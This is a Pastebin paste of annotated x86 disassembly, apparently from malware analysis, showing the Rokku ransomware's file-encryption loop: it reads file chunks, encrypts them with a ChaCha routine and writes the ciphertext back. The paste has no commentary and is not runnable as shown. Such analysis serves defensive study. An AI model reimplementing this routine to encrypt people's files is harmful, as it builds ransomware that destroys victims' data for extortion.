API tools faq
paste
Advertisement
Guest User

Rokku virus encryption loop

a guest
Apr 23rd, 2016
154
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.28 KB | None | 0 0
raw download clone embed print report
  1. 364F19:
  2. mov eax,dword ptr ss:[esp+30040]
  3. mov ecx,dword ptr ss:[esp+30044]
  4. sub eax,edi
  5. sbb ecx,ebp
  6. cmp ebp,ebx
  7. jl 364F65
  8. jg 364F39
  9. cmp edi,4000000
  10. jb 364F65
  11. mov ebp,dword ptr ss:[esp+30044]
  12. xorps xmm0,xmm0
  13. mov edi,dword ptr ss:[esp+30040]
  14. mov ecx,dword ptr ss:[esp+38]
  15. push ebp
  16. push edi
  17. movlpd qword ptr ss:[esp+28],xmm0
  18. call <SeekFilePos>
  19. mov eax,dword ptr ss:[esp+28]
  20. pop ecx
  21. pop ecx
  22. mov ecx,dword ptr ss:[esp+24]
  23. cmp ecx,ebx
  24. ja 364F7E
  25. cmp eax,ebx
  26. ja 364F71
  27. mov esi,ebx
  28. jmp 364F94
  29. cmp ecx,ebx
  30. ja 364F7E
  31. jb 364F83
  32. cmp eax,8000
  33. jb 364F83
  34. mov eax,8000
  35. push ebp
  36. push edi
  37. push eax
  38. lea ecx,dword ptr ss:[esp+44]
  39. call <ReadBuffer>
  40. add esp,C
  41. mov esi,eax
  42. test esi,esi
  43. js 3650DB
  44. je 364FD7
  45. mov eax,393EC0
  46. mov ecx,39E1E0
  47. push esi
  48. push eax
  49. mov edx,eax
  50. call <ChaChaEncrypt>
  51. push ebp
  52. push edi
  53. push esi
  54. mov edx,393EC0
  55. lea ecx,dword ptr ss:[esp+4C]
  56. call <WriteCiphertext>
  57. add esp,14
  58. test eax,eax
  59. js 3650DB
  60. cdq
  61. add edi,eax
  62. adc ebp,edx
  63. jmp 364F19
  64.  
  65. 36BBE1: ChaChaEncrypt:
  66. push ecx
  67. push ebp
  68. push esi
  69. mov esi,dword ptr ss:[esp+14]
  70. mov ebp,edx
  71. push edi
  72. mov edi,ecx
  73. test esi,esi
  74. je 36BC82
  75. mov eax,dword ptr ds:[edi+80]
  76. lea ecx,dword ptr ds:[edi+40]
  77. push ebx
  78. mov ebx,dword ptr ss:[esp+18]
  79. test eax,eax
  80. je 36BC35
  81. cmp esi,eax
  82. mov edx,eax
  83. cmovb edx,esi
  84. sub ecx,eax
  85. add ecx,40
  86. lea eax,dword ptr ds:[ecx+edx]
  87. mov esi,eax
  88. mov al,byte ptr ds:[ecx]
  89. xor al,byte ptr ss:[ebp]
  90. mov byte ptr ds:[ebx],al
  91. inc ebx
  92. inc ecx
  93. inc ebp
  94. cmp ecx,esi
  95. jb 36BC18
  96. mov esi,dword ptr ss:[esp+1C]
  97. lea ecx,dword ptr ds:[edi+40]
  98. sub dword ptr ds:[edi+80],edx
  99. sub esi,edx
  100. test esi,esi
  101. je 36BC81
  102. push 40
  103. pop eax
  104. cmp esi,eax
  105. mov edx,ecx
  106. mov ecx,edi
  107. cmovb eax,esi
  108. mov dword ptr ss:[esp+1C],eax
  109. call <ChaChaDblRound>
  110. lea eax,dword ptr ds:[edi+40]
  111. mov ecx,eax
  112. add eax,dword ptr ss:[esp+1C]
  113. mov dword ptr ss:[esp+10],eax
  114. mov edx,eax
  115. mov al,byte ptr ds:[ecx]
  116. xor al,byte ptr ss:[ebp]
  117. mov byte ptr ds:[ebx],al
  118. inc ebx
  119. inc ecx
  120. inc ebp
  121. cmp ecx,edx
  122. jb 36BC5D
  123. push 40
  124. pop eax
  125. sub eax,dword ptr ss:[esp+1C]
  126. lea ecx,dword ptr ds:[edi+40]
  127. mov dword ptr ds:[edi+80],eax
  128. sub esi,dword ptr ss:[esp+1C]
  129. jne 36BC39
  130. pop ebx
  131. pop edi
  132. pop esi
  133. pop ebp
  134. pop ecx
  135. ret
  136.  
  137. 36B8E2: ChaChaDblRound:
  138. sub esp,38
  139. push ebx
  140. push ebp
  141. push esi
  142. push edi
  143. mov ebx,ecx
  144. mov dword ptr ss:[esp+38],edx
  145. push 10
  146. pop ecx
  147. mov esi,ebx
  148. mov dword ptr ss:[esp+44],ebx
  149. mov edi,edx
  150. rep movsd dword ptr es:[edi],dword ptr ds:[esi]
  151. mov eax,dword ptr ds:[edx+20]
  152. mov ebx,dword ptr ds:[edx+10]
  153. mov esi,dword ptr ds:[edx+30]
  154. mov ecx,dword ptr ds:[edx+14]
  155. mov edi,dword ptr ds:[edx+38]
  156. mov ebp,dword ptr ds:[edx+3C]
  157. mov dword ptr ss:[esp+18],eax
  158. mov eax,dword ptr ds:[edx+4]
  159. mov dword ptr ss:[esp+28],eax
  160. mov eax,dword ptr ds:[edx+34]
  161. mov dword ptr ss:[esp+10],eax
  162. mov eax,dword ptr ds:[edx+24]
  163. mov dword ptr ss:[esp+2C],eax
  164. mov eax,dword ptr ds:[edx+18]
  165. mov dword ptr ss:[esp+1C],eax
  166. mov eax,dword ptr ds:[edx+8]
  167. mov dword ptr ss:[esp+30],eax
  168. mov eax,dword ptr ds:[edx+28]
  169. mov dword ptr ss:[esp+24],eax
  170. mov eax,dword ptr ds:[edx+1C]
  171. mov dword ptr ss:[esp+20],eax
  172. mov eax,dword ptr ds:[edx+C]
  173. mov dword ptr ss:[esp+34],eax
  174. mov eax,dword ptr ds:[edx+2C]
  175. push A
  176. mov dword ptr ss:[esp+18],eax
  177. pop eax
  178. add dword ptr ds:[edx],ebx
  179. dec eax
  180. xor esi,dword ptr ds:[edx]
  181. mov dword ptr ss:[esp+40],eax
  182. mov eax,dword ptr ss:[esp+18]
  183. rol esi,10
  184. add eax,esi
  185. mov dword ptr ss:[esp+18],eax
  186. xor eax,ebx
  187. mov ebx,dword ptr ss:[esp+18]
  188. rol eax,C
  189. add dword ptr ds:[edx],eax
  190. xor esi,dword ptr ds:[edx]
  191. mov edx,dword ptr ss:[esp+2C]
  192. rol esi,8
  193. add ebx,esi
  194. mov dword ptr ss:[esp+18],ebx
  195. xor ebx,eax
  196. mov eax,dword ptr ss:[esp+28]
  197. add eax,ecx
  198. rol ebx,7
  199. mov dword ptr ss:[esp+28],eax
  200. xor eax,dword ptr ss:[esp+10]
  201. rol eax,10
  202. add edx,eax
  203. xor ecx,edx
  204. mov dword ptr ss:[esp+2C],edx
  205. mov edx,dword ptr ss:[esp+28]
  206. rol ecx,C
  207. add edx,ecx
  208. mov dword ptr ss:[esp+10],edx
  209. xor dword ptr ss:[esp+10],eax
  210. mov eax,dword ptr ss:[esp+10]
  211. mov dword ptr ss:[esp+28],edx
  212. mov edx,dword ptr ss:[esp+2C]
  213. rol eax,8
  214. add edx,eax
  215. mov dword ptr ss:[esp+10],eax
  216. mov eax,dword ptr ss:[esp+24]
  217. xor ecx,edx
  218. mov dword ptr ss:[esp+2C],edx
  219. mov edx,dword ptr ss:[esp+30]
  220. add edx,dword ptr ss:[esp+1C]
  221. xor edi,edx
  222. rol ecx,7
  223. rol edi,10
  224. add eax,edi
  225. mov dword ptr ss:[esp+24],eax
  226. xor eax,dword ptr ss:[esp+1C]
  227. rol eax,C
  228. add edx,eax
  229. xor edi,edx
  230. mov dword ptr ss:[esp+30],edx
  231. mov edx,dword ptr ss:[esp+24]
  232. rol edi,8
  233. add edx,edi
  234. mov dword ptr ss:[esp+1C],edx
  235. xor dword ptr ss:[esp+1C],eax
  236. mov eax,dword ptr ss:[esp+20]
  237. mov dword ptr ss:[esp+24],edx
  238. mov edx,dword ptr ss:[esp+34]
  239. add edx,eax
  240. rol dword ptr ss:[esp+1C],7
  241. xor ebp,edx
  242. rol ebp,10
  243. add dword ptr ss:[esp+14],ebp
  244. xor eax,dword ptr ss:[esp+14]
  245. rol eax,C
  246. add edx,eax
  247. xor ebp,edx
  248. mov dword ptr ss:[esp+34],edx
  249. mov edx,dword ptr ss:[esp+14]
  250. rol ebp,8
  251. add edx,ebp
  252. xor eax,edx
  253. mov dword ptr ss:[esp+14],edx
  254. mov edx,dword ptr ss:[esp+38]
  255. rol eax,7
  256. mov dword ptr ss:[esp+20],eax
  257. add dword ptr ds:[edx],ecx
  258. xor ebp,dword ptr ds:[edx]
  259. mov eax,dword ptr ss:[esp+24]
  260. rol ebp,10
  261. add eax,ebp
  262. mov dword ptr ss:[esp+24],eax
  263. xor eax,ecx
  264. mov ecx,eax
  265. mov dword ptr ss:[esp+3C],eax
  266. mov eax,dword ptr ss:[esp+24]
  267. rol ecx,C
  268. add dword ptr ds:[edx],ecx
  269. xor ebp,dword ptr ds:[edx]
  270. mov edx,dword ptr ss:[esp+28]
  271. rol ebp,8
  272. add eax,ebp
  273. xor ecx,eax
  274. mov dword ptr ss:[esp+24],eax
  275. mov eax,dword ptr ss:[esp+1C]
  276. add edx,eax
  277. xor esi,edx
  278. rol ecx,7
  279. rol esi,10
  280. add dword ptr ss:[esp+14],esi
  281. xor eax,dword ptr ss:[esp+14]
  282. rol eax,C
  283. add edx,eax
  284. xor esi,edx
  285. mov dword ptr ss:[esp+28],edx
  286. mov edx,dword ptr ss:[esp+14]
  287. rol esi,8
  288. add edx,esi
  289. xor eax,edx
  290. mov dword ptr ss:[esp+14],edx
  291. mov edx,dword ptr ss:[esp+30]
  292. add edx,dword ptr ss:[esp+20]
  293. rol eax,7
  294. mov dword ptr ss:[esp+1C],eax
  295. mov eax,dword ptr ss:[esp+10]
  296. xor eax,edx
  297. rol eax,10
  298. add dword ptr ss:[esp+18],eax
  299. mov dword ptr ss:[esp+10],eax
  300. mov eax,dword ptr ss:[esp+18]
  301. xor eax,dword ptr ss:[esp+20]
  302. rol eax,C
  303. add edx,eax
  304. xor dword ptr ss:[esp+10],edx
  305. rol dword ptr ss:[esp+10],8
  306. mov dword ptr ss:[esp+30],edx
  307. mov edx,dword ptr ss:[esp+18]
  308. add edx,dword ptr ss:[esp+10]
  309. mov dword ptr ss:[esp+20],edx
  310. xor dword ptr ss:[esp+20],eax
  311. mov eax,dword ptr ss:[esp+2C]
  312. rol dword ptr ss:[esp+20],7
  313. mov dword ptr ss:[esp+18],edx
  314. mov edx,dword ptr ss:[esp+34]
  315. add edx,ebx
  316. xor edi,edx
  317. rol edi,10
  318. add eax,edi
  319. xor ebx,eax
  320. rol ebx,C
  321. add edx,ebx
  322. xor edi,edx
  323. mov dword ptr ss:[esp+34],edx
  324. mov edx,dword ptr ss:[esp+38]
  325. rol edi,8
  326. add eax,edi
  327. xor ebx,eax
  328. mov dword ptr ss:[esp+2C],eax
  329. mov eax,dword ptr ss:[esp+40]
  330. rol ebx,7
  331. test eax,eax
  332. jne 36B954
  333. mov eax,dword ptr ss:[esp+18]
  334. mov dword ptr ds:[edx+20],eax
  335. mov eax,dword ptr ss:[esp+28]
  336. mov dword ptr ds:[edx+4],eax
  337. mov eax,dword ptr ss:[esp+10]
  338. mov dword ptr ds:[edx+34],eax
  339. mov eax,dword ptr ss:[esp+2C]
  340. mov dword ptr ds:[edx+24],eax
  341. mov eax,dword ptr ss:[esp+1C]
  342. mov dword ptr ds:[edx+18],eax
  343. mov eax,dword ptr ss:[esp+30]
  344. mov dword ptr ds:[edx+8],eax
  345. mov eax,dword ptr ss:[esp+24]
  346. mov dword ptr ds:[edx+28],eax
  347. mov eax,dword ptr ss:[esp+20]
  348. mov dword ptr ds:[edx+1C],eax
  349. mov eax,dword ptr ss:[esp+34]
  350. mov dword ptr ds:[edx+C],eax
  351. mov eax,dword ptr ss:[esp+14]
  352. mov dword ptr ds:[edx+30],esi
  353. xor esi,esi
  354. mov dword ptr ds:[edx+10],ebx
  355. mov ebx,dword ptr ss:[esp+44]
  356. mov dword ptr ds:[edx+14],ecx
  357. mov dword ptr ds:[edx+38],edi
  358. mov dword ptr ds:[edx+3C],ebp
  359. mov dword ptr ds:[edx+2C],eax
  360. add edx,2
  361. mov ecx,dword ptr ds:[ebx+esi*4]
  362. add ecx,dword ptr ds:[edx-2]
  363. mov eax,ecx
  364. mov byte ptr ds:[edx-2],cl
  365. shr eax,8
  366. mov byte ptr ds:[edx-1],al
  367. mov eax,ecx
  368. shr eax,10
  369. shr ecx,18
  370. inc esi
  371. mov byte ptr ds:[edx],al
  372. lea edx,dword ptr ds:[edx+4]
  373. mov byte ptr ds:[edx-3],cl
  374. cmp esi,10
  375. jl 36BB9D
  376. add dword ptr ds:[ebx+30],1
  377. jne 36BBD9
  378. add dword ptr ds:[ebx+34],1
  379. jne 36BBD9
  380. add dword ptr ds:[ebx+38],1
  381. jne 36BBD9
  382. inc dword ptr ds:[ebx+3C]
  383. pop edi
  384. pop esi
  385. pop ebp
  386. pop ebx
  387. add esp,38
  388. ret
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!